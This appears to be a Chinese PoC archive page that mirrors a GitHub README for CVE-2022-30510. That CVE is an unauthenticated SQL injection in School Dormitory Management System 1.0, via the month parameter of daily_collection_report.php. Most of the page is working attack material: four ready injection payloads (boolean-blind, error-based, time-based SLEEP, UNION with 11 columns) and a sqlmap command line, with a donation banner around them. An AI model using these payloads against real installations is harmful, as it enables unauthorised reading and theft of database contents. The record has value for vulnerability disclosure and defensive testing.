目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2022-30510 PoC — School Dormitory Management System SQL注入漏洞

来源
https://github.com/bigzooooz/CVE-2022-30510
关联漏洞
标题:School Dormitory Management System SQL注入漏洞 (CVE-2022-30510)
Description:School Dormitory Management System是Carlo Montero个人开发者的一个学校宿舍管理系统。 School Dormitory Management System 存在SQL注入漏洞,该漏洞源于 /dms/admin/reports/daily_collection_report.php 中 GET 类型的 month 参数存在 SQL 注入问题。
Description
School Dormitory Management System 1.0 - Unauthenticated SQL Injection
介绍
# CVE-2022-30510
School Dormitory Management System 1.0 - Unauthenticated SQL Injection

#### Exploit Title: School Dormitory Management System 1.0 - Unauthenticated SQL Injection
#### Date: 2022-05-25
#### CVE: CVE-2022-30510
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.sourcecodester.com/
#### Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
#### Version: 1.0
#### Tested on: LAMP, Ubuntu

-----
[#] Vulnerability Location:
	`$_GET['month']` in `/dms/admin/reports/daily_collection_report.php:59`

>Parameter: month (GET)
	Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: page=reports/daily_collection_report&month=2022-05' RLIKE (SELECT (CASE WHEN (2158=2158) THEN 0x323032322d3035 ELSE 0x28 END))-- UWOA
>
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=reports/daily_collection_report&month=2022-05' AND (SELECT 1645 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(1645=1645,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UlyZ
>
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=reports/daily_collection_report&month=2022-05' AND (SELECT 3409 FROM (SELECT(SLEEP(5)))uaoG)-- rTvo
>
    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: page=reports/daily_collection_report&month=2022-05' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x46716d4777627770436a6b56566f764c4d6f5a6b476b615041477742414f6979424e4f51744a5563,0x71766b7a71),NULL,NULL#
---

[#] Exploitation Using SQLMAP:
	`sqlmap -u "http://localhost/dms/admin/?page=reports/daily_collection_report&month=2022-05" --dbms=mysql`
文件快照

 [4.0K]  /data/pocs/ad74cd1e8fc638ee0238cf279b2541b0f58e7f59
└── [1.9K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。